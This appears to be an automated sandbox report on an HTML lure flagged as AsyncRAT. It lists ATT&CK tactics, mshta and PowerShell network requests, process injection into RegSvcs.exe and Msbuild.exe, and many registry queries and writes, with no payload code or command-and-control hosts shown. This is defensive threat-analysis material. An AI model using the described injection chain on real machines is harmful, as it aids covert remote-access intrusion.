Malware Analysis Report

2024-08-06 13:00

Sample ID 240605-j79k3saf6z
Target ID00909070698876REF.html
SHA256 03a8ee56974fba344c0fa959ca3bca575406711b80ac8785bbc7527a0cc90987
Tags
asyncrat ((((_atendimento_)))) rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

03a8ee56974fba344c0fa959ca3bca575406711b80ac8785bbc7527a0cc90987

Threat Level: Known bad

The file ID00909070698876REF.html was found to be: Known bad.

Malicious Activity Summary

asyncrat ((((_atendimento_)))) rat

AsyncRat

Blocklisted process makes network request

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Checks processor information in registry

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: AddClipboardFormatListener

NTFS ADS

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-05 08:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-05 08:19

Reported

2024-06-05 08:27

Platform

win11-20240508-en

Max time kernel

419s

Max time network

420s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\ID00909070698876REF.html

Signatures

AsyncRat

rat asyncrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4224 set thread context of 5456 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4224 set thread context of 5412 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4224 set thread context of 5428 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 4224 set thread context of 5472 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 4224 set thread context of 5532 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
PID 4224 set thread context of 5544 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133620496119618575" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000100000000000000ffffffff C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Documents" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "4" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000e0859ff2f94f6810ab9108002b27b3d90500000058000000 C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239} C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = ffffffff C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Documents" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Downloads" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Pictures" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByDirection = "1" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\LogicalViewMode = "3" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616193" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
